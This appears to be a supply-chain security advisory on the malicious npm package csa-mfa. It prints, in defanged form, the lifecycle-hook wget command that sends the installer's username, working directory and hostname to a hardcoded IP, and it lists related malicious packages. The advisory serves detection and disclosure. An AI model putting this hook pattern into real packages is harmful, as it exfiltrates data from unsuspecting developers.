csa-mfa@1.1.15
Malicious code in csa-mfa (npm)
T1059 · Command and Scripting InterpreterT1082 · System Information DiscoveryT1041 · Exfiltration Over C2 Channel
Analysis
The package ships no code — only a package.json whose preinstall, preupdate, and test lifecycle hooks each run `wget --quiet "hxxp://169[.]58[.]142[.]14:8080/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"`. On install, the hook exfiltrates the installing user's username, current working directory, and hostname to the hardcoded host 169[.]58[.]142[.]14:8080.
- analyzed by
- Leitwacht
- first seen
- Sep 15, 2026, 10:28 AM
- analyzed
- Sep 15, 2026, 10:30 AM
Related advisories
- strapi-plugin-rsh-meeb322k@3.6.8
- strapi-plugin-revsh-meeb322k@3.6.8
- discord-resolvers@3.4.2
- n8n-nodes-healthmon@1.0.0
- process-tailwind@1.1.99
- n8n-nodes-buildcheck@1.0.0
- pino-ulid@2.12.3
- @biz44/process-runtime-utils@1.1.10
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.